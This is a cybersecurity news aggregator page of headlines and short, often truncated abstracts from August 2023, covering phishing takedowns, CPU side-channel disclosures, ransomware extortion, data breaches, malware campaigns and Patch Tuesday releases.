Interpol has announced the takedown of a phishing-as-a-service (PhaaS) platform called 16Shop, in addition to the arrests of three individuals in Indonesia and Japan. 16Shop specialized in the sales of phishing kits that other cybercriminals can purchase to mount phishing attacks on a large scale, ultimately facilitating the theft of credentials and payment details from users of popular services such as Apple, PayPal, American Express, Amazon, and Cash App, among others. "Victims typically receive an email with a pdf file or link that redirects to a site requesting the victims' credit card or other personally identifiable information," Interpol said. "This information is then stolen and used to extract money from the victims." No less than 70,000 users across 43 countries are estimated to have been compromised via services offered on 16Shop. The law enforcement operation has also led to the arrest of the site's administrator, a 21-year-old IndonesianThe Hacker News
August 10, 2023 – Attack
Pro-Russian Hacker Group Claims Attacks on French, Dutch Websites Full Text
Abstract
The latest attacks come a week after the group, NoName057(16), hit Spanish and Italian government and private sector organizations with distributed denial-of-service (DDoS) attacks.Cyware
August 10, 2023 – General
Report: 37% Of Third-Party Applications Have High-Risk Permissions Full Text
Abstract
Examining data since 2013, Abnormal identified a massive increase in third-party apps integrated with email, underscoring the proliferation of an emerging threat vector that cybercriminals are exploiting as they continue to shift their tactics.Cyware
August 9, 2023 – Business
Horizon3 AI Raises $40 Million to Expand Automated Pentesting Platform Full Text
Abstract
The additional funding will help the San Francisco-based company integrate pentesting, SOAR, and detection engineering into its platform and expand its channel and partner presence to fuel global growth.Cyware
August 09, 2023 – Vulnerabilities
Collide+Power, Downfall, and Inception: New Side-Channel Attacks Affecting Modern CPUs Full Text
Abstract
Cybersecurity researchers have disclosed details of a trio of side-channel attacks that could be exploited to leak sensitive data from modern CPUs. Called Collide+Power (CVE-2023-20583), Downfall (CVE-2022-40982), and Inception (CVE-2023-20569), the novel methods follow the disclosure of another newly discovered security vulnerability affecting AMD's Zen 2 architecture-based processors known as Zenbleed (CVE-2023-20593). "Downfall attacks target a critical weakness found in billions of modern processors used in personal and cloud computers," Daniel Moghimi, senior research scientist at Google, said. "This vulnerability [...] enables a user to access and steal data from other users who share the same computer." In a hypothetical attack scenario, a malicious app installed on a device could weaponize the method to steal sensitive information like passwords and encryption keys, effectively undermining Intel's Software Guard eXtensions (SGXThe Hacker News
August 9, 2023 – Malware
Balada Injector still at large – new domains discovered Full Text
Abstract
The Balada Injector is still at large and still evading security software by utilizing new domain names and using new obfuscation. During a routine web monitoring operation, we discovered an address that led us down a rabbit hole of WordPress-orientated...Security Affairs
August 9, 2023 – General
Data Exfiltration is Now the Go-to Cyber Extortion Strategy Full Text
Abstract
The abuse of zero-day and one-day vulnerabilities in the past six months led to a 143% increase in victims when comparing Q1 2022 with Q1 2023, according to a report by Akamai.Cyware
August 09, 2023 – Attack
China-Linked Hackers Strike Worldwide: 17 Nations Hit in 3-Year Cyber Campaign Full Text
Abstract
Hackers associated with China's Ministry of State Security (MSS) have been linked to attacks in 17 different countries in Asia, Europe, and North America from 2021 to 2023. Cybersecurity firm Recorded Future attributed the intrusion set to a nation-state group it tracks under the name RedHotel (previously Threat Activity Group-22 or TAG-22), which overlaps with a cluster of activity broadly monitored as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and Red Scylla (or Red Dev 10). Active since 2019, some of the prominent sectors targeted by the prolific actor encompass academia, aerospace, government, media, telecommunications, and research. A majority of the victims during the period were government organizations. "RedHotel has a dual mission of intelligence gathering and economic espionage," the cybersecurity company said, calling out its persistence, operational intensity, and global reach. "It targets both government entities forThe Hacker News
August 9, 2023 – Phishing
EvilProxy used in massive cloud account takeover scheme Full Text
Abstract
Cloud account takeover scheme utilizing EvilProxy hit over 100 top-level executives of global organizations. EvilProxy was observed sending 120,000 phishing emails to over a hundred organizations to steal Microsoft 365 accounts. Proofpoint noticed...Security Affairs
August 9, 2023 – General
Hackers Prepare to Take on a Satellite at DEF CON Full Text
Abstract
The annual Hack-A-Sat CTF competition held at Aerospace Village at the DEF CON in Las Vegas is the first time an on-orbit satellite will test contestants' mettle while bringing together hackers who don’t typically work on space systems.Cyware
August 09, 2023 – Solution
Continuous Security Validation with Penetration Testing as a Service (PTaaS) Full Text
Abstract
Validate security continuously across your full stack with Pen Testing as a Service. In today's modern security operations center (SOC), it's a battle between the defenders and the cybercriminals. Both are using tools and expertise – however, the cybercriminals have the element of surprise on their side, and a host of tactics, techniques, and procedures (TTPs) that have evolved. These external threat actors have now been further emboldened in the era of AI with open-source tools like ChatGPT. With the potential of an attack leading to a breach within minutes, CISOs now are looking to prepare all systems and assets for cyber resilience and rapid response when needed. With tools and capabilities to validate security continuously – including penetration testing as a service – DevSecOps teams can remediate critical vulnerabilities fast due to the easy access to tactical support for the teams that need it the most. This gives the SOC and DevOps teams tools that remove false poThe Hacker News
August 9, 2023 – Vulnerabilities
Downfall Intel CPU side-channel attack exposes sensitive data Full Text
Abstract
Google researcher Daniel Moghimi devised a new side-channel attack technique, named Downfall, against Intel CPUs. Google researcher Daniel Moghimi devised a new side-channel attack technique against Intel CPUs, named Downfall, that relies on a flaw tracked...Security Affairs
August 9, 2023 – Ransomware
The Ransomware Rollercoaster Continues as Criminals Advance Their Business Models Full Text
Abstract
Ransomware shows no signs of slowing, with ransomware activity ending 13 times higher than at the start of 2023 as a proportion of all malware detections, according to Fortinet.Cyware
August 09, 2023 – Solution
New Android 14 Security Feature: IT Admins Can Now Disable 2G Networks Full Text
Abstract
Google has introduced a new security feature in Android 14 that allows IT administrators to disable support for 2G cellular networks in their managed device fleet. The search giant said it's introducing a second user setting to turn off support, at the model level, for null-ciphered cellular connections. "The Android Security Model assumes that all networks are hostile to keep users safe from network packet injection, tampering, or eavesdropping on user traffic," Roger Piqueras Jover, Yomna Nasser, and Sudhi Herle said. "Android does not rely on link-layer encryption to address this threat model. Instead, Android establishes that all network traffic should be end-to-end encrypted (E2EE)." 2G networks, in particular, employ weak encryption and lack mutual authentication, rendering them susceptible to over-the-air interception and traffic decryption attacks by impersonating a real 2G tower. The threat posed by rogue cellular base stations means thThe Hacker News
August 9, 2023 – Breach
LockBit threatens to leak medical data of cancer patients stolen from Varian Medical Systems Full Text
Abstract
The LockBit ransomware group threatens to leak medical data of cancer patients stolen from Varian Medical Systems. The LockBit ransomware group claims to have hacked the healthcare company Varian Medical Systems and threatens to leak the medical data...Security Affairs
August 9, 2023 – Business
Rubrik Buys Startup Laminar to Unify Cyber Posture, Recovery Full Text
Abstract
Rubrik purchased a data security posture management startup backed by Salesforce and SentinelOne to provide visibility into where a company's data lives and who has access.Cyware
August 09, 2023 – Breach
U.K. Electoral Commission Breach Exposes Voter Data of 40 Million Britons Full Text
Abstract
The U.K. Electoral Commission on Tuesday disclosed a "complex" cyber attack on its systems that went undetected for over a year, allowing the threat actors to access years' worth of voter data belonging to 40 million people. "The incident was identified in October 2022 after suspicious activity was detected on our systems," the regulator said. "It became clear that hostile actors had first accessed the systems in August 2021." The intrusion enabled unauthorized access to the Commission's servers hosting email, control systems, and copies of the electoral registers it maintains for research purposes. The identity of the intruders is presently unknown. The registers included the name and address of anyone in the U.K. who registered to vote between 2014 and 2022, as well as the names of those registered as overseas voters. However, they did not contain information of those who qualified to register anonymously and addresses of overseas electors regiThe Hacker News
August 9, 2023 – Attack
Big Cyberespionage Attack Against Japan Attributed to China Full Text
Abstract
Classified military networks run by Japan reportedly suffered a massive breach in 2020 at the hands of a Chinese cyberespionage group that proved tough to eject even after being discovered.Cyware
August 09, 2023 – Vulnerabilities
Microsoft Releases Patches for 74 New Vulnerabilities in August Update Full Text
Abstract
Microsoft has patched a total of 74 flaws in its software as part of the company's Patch Tuesday updates for August 2023, down from the voluminous 132 vulnerabilities the company fixed last month. This comprises six Critical, 67 Important, and one Moderate severity vulnerabilities. Released along with the security improvements are two defense-in-depth updates for Microsoft Office (ADV230003) and the Memory Integrity System Readiness Scan Tool (ADV230004). The updates are also in addition to 30 issues addressed by Microsoft in its Chromium-based Edge browser since last month's Patch Tuesday edition and one side-channel flaw impacting certain processor models offered by AMD (CVE-2023-20569 or Inception). ADV230003 concerns an already known security flaw tracked as CVE-2023-36884, a remote code execution vulnerability in Office and Windows HTML that has been actively exploited by the Russia-linked RomCom threat actor in attacks targeting Ukraine as well as pro-UkrThe Hacker News
August 9, 2023 – Solution
Android 14 Introduces First-Of-Its-Kind Cellular Connectivity Security Features Full Text
Abstract
Android 14 introduces new security measures to mitigate the risks associated with 2G networks, allowing users and enterprises to disable 2G connectivity and protect against potential attacks.Cyware
August 09, 2023 – Cryptocurrency
Malicious Campaigns Exploit Weak Kubernetes Clusters for Crypto Mining Full Text
Abstract
Exposed Kubernetes (K8s) clusters are being exploited by malicious actors to deploy cryptocurrency miners and other backdoors. Cloud security firm Aqua, in a report shared with The Hacker News, said a majority of the clusters belonged to small to medium-sized organizations, with a smaller subset tied to bigger companies, spanning financial, aerospace, automotive, industrial, and security sectors. In total, Kubernetes clusters belonging to more than 350 organizations, open-source projects, and individuals were discovered, 60% of which were the target of an active crypto-mining campaign. The publicly-accessible clusters, per Aqua, are said to suffer from two different kinds of misconfigurations: allowing anonymous access with high privileges and running kubectl proxy with the flags "--address=0.0.0.0 --accept-hosts=.*". "Housing a wide array of sensitive and valuable assets, Kubernetes clusters can store customer data, financial records, intellectual property, aThe Hacker News
August 9, 2023 – Breach
Lockbit Threatens to Leak Medical Data of Cancer Patients Stolen From Varian Medical Systems Full Text
Abstract
Lockbit has fixed the deadline for the ransom payment on August 17, 2023. If confirmed, the incident could have a dramatic impact on the privacy of cancer patients. The company has yet to disclose the security incident.Cyware
August 09, 2023 – Criminals
New Report Exposes Vice Society’s Collaboration with Rhysida Ransomware Full Text
Abstract
Tactical similarities have been unearthed between the double extortion ransomware group known as Rhysida and Vice Society, including in their targeting of education and healthcare sectors. "As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware," Check Point said in a new report. Vice Society, tracked by Microsoft under the name Storm-0832, has a pattern of employing already existing ransomware binaries that are sold on criminal forums to pull off their attacks. The financially motivated gang has also been observed resorting to pure extortion-themed attacks wherein the data is exfiltrated without encrypting them. First observed in May 2023, the Rhysida ransomware group is known to rely on phishing attacks and Cobalt Strike to breach targets' networks andThe Hacker News
August 9, 2023 – Policy and Law
For TSA’s Updated Pipeline Security Directive, Consistency and Collaboration are Key Full Text
Abstract
This most recent update does not vacate previously established requirements in the simple pursuit of change. Instead, the new directive pursues incremental change that builds on but does not abandon previous requirements.Cyware
August 8, 2023 – Attack
Ukrainian State Agencies Targeted with Open-Source Malware MerlinAgent Full Text
Abstract
In early August, an unidentified threat actor tracked as UAC-0154 sent malicious emails to its targets, purportedly containing security tips from Ukraine's computer emergency response team (CERT-UA).Cyware
August 08, 2023 – Malware
QakBot Malware Operators Expand C2 Network with 15 New Servers Full Text
Abstract
The operators associated with the QakBot (aka QBot) malware have set up 15 new command-and-control (C2) servers as of late June 2023. The findings are a continuation of the malware's infrastructure analysis from Team Cymru, and arrive a little over two months after Lumen Black Lotus Labs revealed that 25% of its C2 servers are only active for a single day. "QakBot has a history of taking an extended break each summer before returning sometime in September, with this year's spamming activities ceasing around 22 June 2023," the cybersecurity firm said. "But are the QakBot operators actually on vacation when they aren't spamming, or is this 'break' a time for them to refine and update their infrastructure and tools?" QakBot's C2 network, like in the case of Emotet and IcedID, is characterized by a tiered architecture in which C2 nodes communicate with upstream Tier 2 (T2) C2 nodes hosted on VPS providers geolocated in Russia. A majoThe Hacker News
August 8, 2023 – Vulnerabilities
Microsoft Patch Tuesday for August 2023 fixed 2 actively exploited flaws Full Text
Abstract
Microsoft Patch Tuesday security updates for August 2023 addressed 74 vulnerabilities, including two actively exploited flaws. Microsoft Patch Tuesday security updates for August 2023 addressed 74 new vulnerabilities in multiple products including...Security Affairs
August 8, 2023 – Hacker
New Threat Actor Targets Bulgaria, China, Vietnam, and Other Countries With Customized Yashma Ransomware Full Text
Abstract
The threat actor behind this operation uses an uncommon technique of downloading the ransom note from a GitHub repository, evading detection by embedding it in an embedded batch file.Cyware
August 08, 2023 – Hacker
Hackers Abusing Cloudflare Tunnels for Covert Communications Full Text
Abstract
New research has revealed that threat actors are abusing Cloudflare Tunnels to establish covert communication channels from compromised hosts and retain persistent access. "Cloudflared is functionally very similar to ngrok," Nic Finn, a senior threat intelligence analyst at GuidePoint Security, said. "However, Cloudflared differs from ngrok in that it provides a lot more usability for free, including the ability to host TCP connectivity over cloudflared." A command-line tool for Cloudflare Tunnel, cloudflared allows users to create secure connections between an origin web server and Cloudflare's nearest data center so as to hide the web server IP addresses as well as block volumetric distributed denial-of-service (DDoS) and brute-force login attacks. For a threat actor with elevated access on an infected host, this feature presents a lucrative approach to set up a foothold by generating a token required to establish the tunnel from the victim machine.The Hacker News
August 8, 2023 – Breach
UK Electoral Commission discloses a data breach Full Text
Abstract
The UK Electoral Commission suffered a data breach that exposed voters' personal information between 2014 and 2022. The UK Electoral Commission disclosed a data breach that exposed the personal information of voters in the United Kingdom between 2014...Security Affairs
August 8, 2023 – Government
White House Pushes Cybersecurity Defense for K-12 Schools Full Text
Abstract
Typically understaffed and underfunded when it comes to cybersecurity, American K-12 schools have experienced a ramp-up in ransomware attacks, particularly after the pandemic forced the hasty adoption of remote tools for teaching.Cyware
August 08, 2023 – Education
Understanding Active Directory Attack Paths to Improve Security Full Text
Abstract
Introduced in 1999, Microsoft Active Directory is the default identity and access management service in Windows networks, responsible for assigning and enforcing security policies for all network endpoints. With it, users can access various resources across networks. As things tend to do, times, they are a'changin' – and a few years back, Microsoft introduced Azure Active Directory, the cloud-based version of AD to extend the AD paradigm, providing organizations with an Identity-as-a-Service (IDaaS) solution across both the cloud and on-prem apps. (Note that as of July 11th 2023, this service was renamed to Microsoft Entra ID, but for the sake of simplicity, we'll refer to it as Azure AD in this post.) Both Active Directory and Azure AD are critical to the functioning of on-prem, cloud-based, and hybrid ecosystems, playing a key role in uptime and business continuity. And with 90% of organizations using the service for employee authentication, access control and ID managThe Hacker News
August 8, 2023 – Government
HHS Warns Healthcare Sector of Attacks by Rhysida Ransomware Group Full Text
Abstract
Authorities are sounding the alarm about double-extortion attacks against healthcare and public health sector organizations by a relatively new ransomware-as-a-service group, Rhysida, which until recently had mainly focused on other industries.Cyware
August 08, 2023 – Ransomware
New Yashma Ransomware Variant Targets Multiple English-Speaking Countries Full Text
Abstract
An unknown threat actor is using a variant of the Yashma ransomware to target various entities in English-speaking countries, Bulgaria, China, and Vietnam at least since June 4, 2023. Cisco Talos, in a new write-up, attributed the operation with moderate confidence to an adversary of likely Vietnamese origin. "The threat actor uses an uncommon technique to deliver the ransom note," security researcher Chetan Raghuprasad said. "Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file." Yashma, first described by the BlackBerry research and intelligence team in May 2022, is a rebranded version of another ransomware strain called Chaos. A month prior to its emergence, the Chaos ransomware builder was leaked in the wild. A notable aspect of the ransom note is its resemblance to the well-known WannaCry ransomware, possibly done so in an attempt to obsThe Hacker News
August 8, 2023 – Government
CISA Unveils Cybersecurity Strategic Plan for Next Three Years Full Text
Abstract
The Cybersecurity Strategic Plan for fiscal years 2024-2026 outlines the agency’s plans for achieving a future where damaging cyberattacks are rare, organizations are resilient, and technology is secure by design.Cyware
August 8, 2023 – Phishing
Massive Phishing Campaign Impersonates 340 Companies Using Over 800 Scam Domains Full Text
Abstract
The phishing operation, originating from Russia but pretending to be Ukrainian, utilized a high-quality single-page application to create convincing websites and steal credit card and bank details.Cyware
August 8, 2023 – Criminals
Nigerian Man Admits to $1.3M Business Email Compromise Scam Full Text
Abstract
A Nigerian national pleaded guilty to participating in a BEC scheme to steal $1.25m from a Boston investment firm. The scam involved using malware and a spoofed domain name to trick the firm into transferring money to attacker-controlled accounts.Cyware
August 8, 2023 – Phishing
Teach a Man to Phish and He’s Set for Life – Krebs on Security Full Text
Abstract
A recent phishing scam has been using an old trick to fool Microsoft Windows users. The scam involves sending an email with an attachment that appears to be a PDF file, but is actually an .eml file disguised as a .pdf.Cyware
August 08, 2023 – Malware
LOLBAS in the Wild: 11 Living-Off-The-Land Binaries Used for Malicious Purposes Full Text
Abstract
Cybersecurity researchers have discovered a set of 11 living-off-the-land binaries-and-scripts (LOLBAS) that could be maliciously abused by threat actors to conduct post-exploitation activities. "LOLBAS is an attack method that uses binaries and scripts that are already part of the system for malicious purposes," Pentera security researcher Nir Chako said. "This makes it hard for security teams to distinguish between legitimate and malicious activities, since they are all performed by trusted system utilities." To that end, the Israeli cybersecurity company said it uncovered nine LOLBAS downloaders and three executors that could enable adversaries to download and execute "more robust malware" on infected hosts. This includes: MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. "In a complete attack chain, a hacker will usThe Hacker News
August 8, 2023 – Vulnerabilities
43 Android apps in Google Play with 2.5M installs loaded ads when a phone screen was off Full Text
Abstract
Experts found 43 Android apps in Google Play with 2.5 million installs that displayed advertisements while a phone's screen was off. Recently, researchers from McAfee’s Mobile Research Team discovered 43 Android apps in Google Play with 2.5 million...Security Affairs
August 8, 2023 – Business
Cyberinsurance Firm Resilience Raises $100 Million to Expand Its Cyber Risk Platform Full Text
Abstract
The Series D round was led by Intact Ventures, an affiliate of Resilience’s primary capacity provider, Intact Insurance’s underwriting companies, with participation by Lightspeed Venture Partners, as well as General Catalyst and Founders Fund.Cyware
August 8, 2023 – Malware
Latest Batloader Campaigns Use Pyarmor Pro for Evasion Full Text
Abstract
The Batloader initial access malware, used by the group Water Minyades, has upgraded its evasion techniques by utilizing Pyarmor Pro to obfuscate its malicious Python scripts.Cyware
August 7, 2023 – Criminals
Cl0p Ransomware Gang Revises its Extortion Strategy Full Text
Abstract
MOVEit-hijacker Cl0p ransomware gang has changed its extortion tactics and is now using torrents to distribute data stolen in the MOVEit Transfer breaches. Previously, the group utilized Tor data leak sites, but this method was slow and easier to shut down. Through torrents, criminals are expecting ...Cyware
August 07, 2023 – Malware
New Malware Campaign Targets Inexperienced Cyber Criminals with OpenBullet Configs Full Text
Abstract
A new malware campaign has been observed making use of malicious OpenBullet configuration files to target inexperienced cyber criminals with the goal of delivering a remote access trojan (RAT) capable of stealing sensitive information. Bot mitigation company Kasada said the activity is designed to "exploit trusted criminal networks," describing it as an instance of advanced threat actors "preying on beginner hackers." OpenBullet is a legitimate open-source pen testing tool used for automating credential stuffing attacks. It takes in a configuration file that's tailored to a specific website and can combine it with a password list procured through other means to log successful attempts. "OpenBullet can be used with Puppeteer, which is a headless browser that can be used for automating web interactions," the company said. "This makes it very easy to launch credential stuffing attacks without having to deal with browser windows popping uThe Hacker News
August 7, 2023 – Privacy
Zoom trains its AI model with some user data, without giving them an opt-out option Full Text
Abstract
Zoom changed its terms of service requiring users to allow AI to train on all their data without giving them an opt-out option. Zoom updated its terms of service and informed users that it will train its artificial intelligence models using some...Security Affairs
August 7, 2023 – Criminals
Spyware Maker Letmespy Shuts Down After Hacker Deletes Server Data Full Text
Abstract
In a notice on its website in both English and Polish, LetMeSpy confirmed the “permanent shutdown” of the spyware service and that it would cease operations by the end of August.Cyware
August 07, 2023 – Attack
North Korean Hackers Target Russian Missile Engineering Firm Full Text
Abstract
Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya. Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed OpenCarrot. The breach of the Linux email server has been attributed to ScarCruft. OpenCarrot, on the other hand, is a known implant previously identified as used by the Lazarus Group. The attacks were flagged in mid-May 2022. A rocket design bureau based in Reutov, NPO Mashinostroyeniya was sanctioned by the U.S. Treasury Department in July 2014 in connection to "Russia's continued attempts to destabilize eastern Ukraine and its ongoing occupation of Crimea." While both ScarCruft (aka APT37) and the Lazarus Group are affiliated to North Korea, it's wThe Hacker News
August 7, 2023 – Breach
North Korea compromised Russian missile engineering firm NPO Mashinostroyeniya Full Text
Abstract
Two North Korea-linked APT groups compromised the infrastructure of the major Russian missile engineering firm NPO Mashinostroyeniya. Cybersecurity firm SentinelOne linked the compromise of the major Russian missile engineering firm NPO Mashinostroyeniya...Security Affairs
August 7, 2023 – General
C-Suite, Rank-And-File at Odds Over Security’s Role Full Text
Abstract
A disconnect is brewing between how C-suite executives and cybersecurity workers perceive security’s role, according to a Cloud Security Alliance report released last week. The study by Expel surveyed 1,000 IT and security professionals in May.Cyware
August 07, 2023 – Solution
Enhancing Security Operations Using Wazuh: Open Source XDR and SIEM Full Text
Abstract
In today's interconnected world, evolving security solutions to meet growing demand is more critical than ever. Collaboration across multiple solutions for intelligence gathering and information sharing is indispensable. The idea of multiple-source intelligence gathering stems from the concept that threats are rarely isolated. Hence, their detection and prevention require a comprehensive understanding of the broader landscape. A comprehensive and robust security framework should be established by aggregating resources, knowledge, and expertise from various sources. This collaborative effort allows for the analysis of diverse data sets, the identification of emerging patterns, and the timely dissemination of crucial information. In this article, we discuss a versatile security platform that can operate in two distinct roles within a security ecosystem. This platform can function as a subscriber, actively collecting and aggregating security data from various endpoints and other soThe Hacker News
August 7, 2023 – Malware
A new sophisticated SkidMap variant targets unsecured Redis servers Full Text
Abstract
A new campaign targets Redis servers, this time the malware employed in the attacks is a new variant of the SkidMap malware. Skidmap is a piece of crypto-miner detected by Trend Micro in September 2019 while it was targeting Linux machines. The malicious...Security Affairs
August 7, 2023 – Government
US ‘Lagging Behind’ on Border Gateway Protocol Security Practices, CISA and FCC Chiefs Say Full Text
Abstract
The U.S. government is lagging behind other countries in instituting more stringent cybersecurity measures governing the Border Gateway Protocol (BGP) – a set of technical rules responsible for routing data efficiently.Cyware
August 07, 2023 – Education
New ‘Deep Learning Attack’ Deciphers Laptop Keystrokes with 95% Accuracy Full Text
Abstract
A group of academics has devised a "deep learning-based acoustic side-channel attack" that can be used to classify laptop keystrokes that are recorded using a nearby phone with 95% accuracy. "When trained on keystrokes recorded using the video conferencing software Zoom, an accuracy of 93% was achieved, a new best for the medium," researchers Joshua Harrison, Ehsan Toreini, and Maryam Mehrnezhad said in a new study published last week. Side-channel attacks refer to a class of security exploits that aim to glean insights from a system by monitoring and measuring its physical effects during the processing of sensitive data. Some of the common observable effects include runtime behavior, power consumption, electromagnetic radiation, acoustics, and cache accesses. Although a completely side-channel-free implementation does not exist, practical attacks of this kind can have damaging consequences for user privacy and security as they could be weaponized by a maThe Hacker News
August 7, 2023 – Government
FBI warns of crooks posing as NFT developers in fraudulent schema Full Text
Abstract
The FBI is warning about cyber criminals masquerading as NFT developers to steal cryptocurrency and other digital assets. The U.S. Federal Bureau of Investigation (FBI) is warning about cyber criminals posing as legitimate NFT developers in fraud...Security Affairs
August 7, 2023 – General
VPNs remain a risky gamble for remote access Full Text
Abstract
A new Zscaler report stresses the need for organizations to reevaluate their security posture and migrate to a zero-trust architecture due to the increasing threat of cybercriminals exploiting VPN vulnerabilities.Cyware
August 07, 2023 – Malware
New SkidMap Linux Malware Variant Targeting Vulnerable Redis Servers Full Text
Abstract
Vulnerable Redis services have been targeted by a "new, improved, dangerous" variant of a malware called SkidMap that's engineered to target a wide range of Linux distributions. "The malicious nature of this malware is to adapt to the system on which it is executed," Trustwave security researcher Radoslaw Zdonczyk said in an analysis published last week. Some of the Linux distribution SkidMap sets its eyes on include Alibaba, Anolis, openEuler, EulerOS, Stream, CentOS, RedHat, and Rocky. SkidMap was first disclosed by Trend Micro in September 2019 as a cryptocurrency mining botnet with capabilities to load malicious kernel modules that can obfuscate its activities as well as monitor the miner process. The operators of the malware have also been found camouflaging their backup command-and-control (C2) IP address on the Bitcoin blockchain, evocative of another botnet malware known as Glupteba. "The technique of fetching real-time data from a deThe Hacker News
August 7, 2023 – General
The number of ransomware attacks targeting Finland increased fourfold since it started the process to join NATO Full Text
Abstract
Senior official reports a quadruple increase in ransomware attacks against Finland since it started the process to join NATO. The number of ransomware attacks targeting Finland has increased fourfold since the country began the process of joining...Security Affairs
August 7, 2023 – Malware
Reptile Rootkit Targets Linux Systems in South Korea Full Text
Abstract
Reptile, an open-source kernel module rootkit designed to target Linux systems, was found on GitHub. Unlike typical rootkit malware, Reptile not only conceals its presence but also offers a reverse shell, granting threat actors control over compromised systems. It is crucial to regularly inspect ...Cyware
August 07, 2023 – Government
FBI Alert: Crypto Scammers are Masquerading as NFT Developers Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) is warning about cyber crooks masquerading as legitimate non-fungible token (NFT) developers to steal cryptocurrency and other digital assets from unsuspecting users. In these fraudulent schemes, criminals either obtain direct access to NFT developer social media accounts or create look-alike accounts to promote "exclusive" new NFT releases, often employing misleading advertising campaigns that create a sense of urgency to pull them off. "Links provided in these announcements are phishing links directing victims to a spoofed website that appears to be a legitimate extension of a particular NFT project," the FBI said in an advisory last week. The replica websites urge potential targets to connect their cryptocurrency wallets and purchase the NFT, only for the threat actors to siphon the funds and NFTs to wallets under their control. "Contents stolen from victims' wallets are often processed through a serThe Hacker News
August 7, 2023 – Solution
Multi-Modal Data Protection With AI’s Help Full Text
Abstract
Multi-modal monitoring through AI enables the identification of both data and conversation types, enhancing the ability to detect and prevent data leakage or any unauthorized activities.Cyware
August 6, 2023 – Vulnerabilities
Microsoft fixed a flaw in Power Platform after being criticized Full Text
Abstract
Microsoft announced it has addressed a critical flaw in its Power Platform after it was criticized for the delay in fixing the issue. Microsoft this week addressed a critical vulnerability in its Power Platform, after it was criticized for the delay...Security Affairs
August 6, 2023 – Breach
Colorado Department of Higher Education (CDHE) discloses data breach after ransomware attack Full Text
Abstract
The Colorado Department of Higher Education (CDHE) finally disclosed a data breach impacting students, past students, and teachers after the June attack. In June a ransomware attack hit the Colorado Department of Higher Education (CDHE), now the organization...Security Affairs
August 6, 2023 – General
Security Affairs newsletter Round 431 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Reptile...Security Affairs
August 6, 2023
BlueCharlie changes attack infrastructure in response to reports on its activity Full Text
Abstract
Russia-linked APT group BlueCharlie was observed changing its infrastructure in response to recent reports on its activity. Researchers from Recorded Future reported that Russia-linked APT group BlueCharlie (aka Blue Callisto, Callisto, COLDRIVER,...Security Affairs
August 5, 2023 – Government
CISA Cybersecurity Strategic Plan: An Important Step To Secure Critical Infrastructure Full Text
Abstract
As a founding member of the Network Resilience Coalition, Cisco appreciates CISA’s shared commitment to driving focused attention and investment in efforts to secure and maintain existing critical networked technologies.Cyware
August 05, 2023 – Solution
MDR: Empowering Organizations with Enhanced Security Full Text
Abstract
Managed Detection and Response (MDR) has emerged as a crucial solution for organizations looking to bolster their security measures. MDR allows businesses to outsource the management of Endpoint Detection and Response (EDR) products deployed across their network domain. With real-time threat-hunting capabilities, MDR services detect and mitigate malicious activities on individual endpoints while promptly alerting the service provider's Security Operations Center (SOC) for further investigation. By leveraging the expertise of security specialists, MDR services relieve organizations of the complexities and criticality associated with security operations. Types of MDR Solutions: MDR services come in various forms, tailored to an organization's technology environment and risk requirements. These include: Bring-Your-Own Security Stack / Hybrid Solution: MDR solutions that integrate with existing security products deployed within an environment. Full Vendor-Supplied MDR StaThe Hacker News
August 5, 2023 – Vulnerabilities
CISA, Five Eyes cyber advisory lists common vulnerabilities among 2022’s top exploits Full Text
Abstract
This guidance is the latest released by the Five Eyes organization, which consists of government cybersecurity organizations from the U.S., New Zealand, the U.K., Australia and Canada.Cyware
August 05, 2023 – Malware
Reptile Rootkit: Advanced Linux Malware Targeting South Korean Systems Full Text
Abstract
Threat actors are using an open-source rootkit called Reptile to target Linux systems in South Korea. "Unlike other rootkit malware that typically only provide concealment capabilities, Reptile goes a step further by offering a reverse shell, allowing threat actors to easily take control of systems," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. "Port knocking is a method where the malware opens a specific port on an infected system and goes on standby. When the threat actor sends a magic packet to the system, the received packet is used as a basis to establish a connection with the C&C server." A rootkit is a malicious software program that's designed to provide privileged, root-level access to a machine while concealing its presence. At least four different campaigns have leveraged Reptile since 2022. The first use of the rootkit was recorded by Trend Micro in May 2022 in connection with an intrusionThe Hacker News
August 5, 2023 – Breach
Millions of people’s healthcare files accessed by Clop gang Full Text
Abstract
The new additions to the victims' list bring the headcount to 514 organizations and more than 36 million individuals, according to Emsisoft threat researchers. It may take months if not years for the full impact and costs to become clear.Cyware
August 05, 2023 – Vulnerabilities
Microsoft Addresses Critical Power Platform Flaw After Delays and Criticism Full Text
Abstract
Microsoft on Friday disclosed that it has addressed a critical security flaw impacting Power Platform, but not before it came under criticism for its failure to swiftly act on it. "The vulnerability could lead to unauthorized access to Custom Code functions used for Power Platform custom connectors," the tech giant said. "The potential impact could be unintended information disclosure if secrets or other sensitive information were embedded in the Custom Code function." The company further noted that no customer action is required and that it found no evidence of active exploitation of the vulnerability in the wild. Tenable, which initially discovered and reported the shortcoming to Redmond on March 30, 2023, said the problem could enable limited, unauthorized access to cross-tenant applications and sensitive data. The cybersecurity firm said the flaw arises as a result of insufficient access control to Azure Function hosts, leading to a scenario where a tThe Hacker News
August 5, 2023 – Outage
Cyberattack disrupts hospital computer systems across US, hindering services Full Text
Abstract
The hack caused chaos in medical facilities in several states. In Connecticut, the emergency departments at Manchester Memorial and Rockville General hospital were closed for much of the day and patients were diverted to other nearby medical centers.Cyware
August 05, 2023 – Vulnerabilities
Researchers Uncover New High-Severity Vulnerability in PaperCut Software Full Text
Abstract
